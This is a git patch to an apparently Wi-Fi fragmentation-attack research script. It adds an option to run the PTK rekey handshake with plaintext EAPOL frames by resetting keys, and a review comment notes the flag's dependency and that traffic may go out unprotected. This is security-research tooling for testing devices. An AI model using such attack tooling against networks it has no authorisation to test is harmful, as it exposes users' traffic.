From b298bdafaae3835ae69eff7881ccb78cf62e7087 Mon Sep 17 00:00:00 2001
From: Mathy
Date: Fri, 24 Apr 2020 14:02:05 -0400
Subject: [PATCH] fragattack: option to perform PTK rekey in plaintext
---
 research/fragattack.py | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)
diff --git a/research/fragattack.py b/research/fragattack.py
index 94dabbf96..ab9c161b3 100755
--- a/research/fragattack.py
+++ b/research/fragattack.py
@@ -289,9 +289,7 @@ class PingTest(Test):
 elif act.action == Action.Inject:
 fragnums.append(next_fragnum)
 next_fragnum += 1
- print("Actions before:", self.actions)
 self.actions = list(filter(lambda act: not act.is_meta(Action.MetaDrop), self.actions))
- print("Actions after:", self.actions)
 
 # Generate all the individual (fragmented) frames
 num_frags = len(self.get_actions(Action.Inject))
@@ -1051,6 +1049,12 @@ class Supplicant(Daemon):
 if self.options.rekey_request:
 log(STATUS, "Actively requesting PTK rekey", color="green")
 wpaspy_command(self.wpaspy_ctrl, "KEY_REQUEST 0 1")
+
+ # The RT-AC51U does the 4-way rekey HS in plaintext. So in some cases we must
+ # remove the keys so our script will send the EAPOL frames in plaintext.
+ if self.options.rekey_plaintext:
+ log(STATUS, "Removing keys to perform rekey using plaintext EAPOL frames")
+ self.station.reset_keys()
 else:
 log(STATUS, "Client cannot force rekey. Waiting on AP to start PTK rekey.", color="orange")
 
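Review bot: `self.options.rekey_plaintext` is read only inside the `if self.options.rekey_request:` branch of the Supplicant hunk, so `--rekey-plaintext` given without `--rekey-request` is silently ignored and the AP-initiated rekey path in the `else:` branch never removes the keys. Either state the dependency in the argparse hunk below, `help="Do PTK rekey with plaintext EAPOL frames. Only has effect together with --rekey-request."`, and reject the lone flag with `parser.error(...)` after `parse_args()`, or hoist the check out of the `rekey_request` branch if plaintext rekeys should also be exercised when the AP starts the handshake. The new comment should also spell out the consequence of `self.station.reset_keys()` for the reader: after it, presumably every frame the station transmits until a new PTK is installed goes out unprotected, not only the EAPOL frames, which is why this belongs behind an explicit test-only option. The enclosing method starts and ends outside the hunk.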
@@ -1374,6 +1378,7 @@ if __name__ == "__main__":
 parser.add_argument('--dhcp', default=False, action='store_true', help="Override default request with DHCP discover.")
 parser.add_argument('--icmp', default=False, action='store_true', help="Override default request with ICMP ping request.")
 parser.add_argument('--rekey-request', default=False, action='store_true', help="Actively request PTK rekey as client.")
+ parser.add_argument('--rekey-plaintext', default=False, action='store_true', help="Do PTK rekey with plaintext EAPOL frames.")
 args = parser.parse_args()
 ptype = args2ptype(args)
@@ -1386,6 +1391,7 @@ if __name__ == "__main__":
 options.ip = args.ip
 options.peerip = args.peerip
 options.rekey_request = args.rekey_request
+ options.rekey_plaintext = args.rekey_plaintext
 
 # Parse remaining options
 global_log_level -= args.debug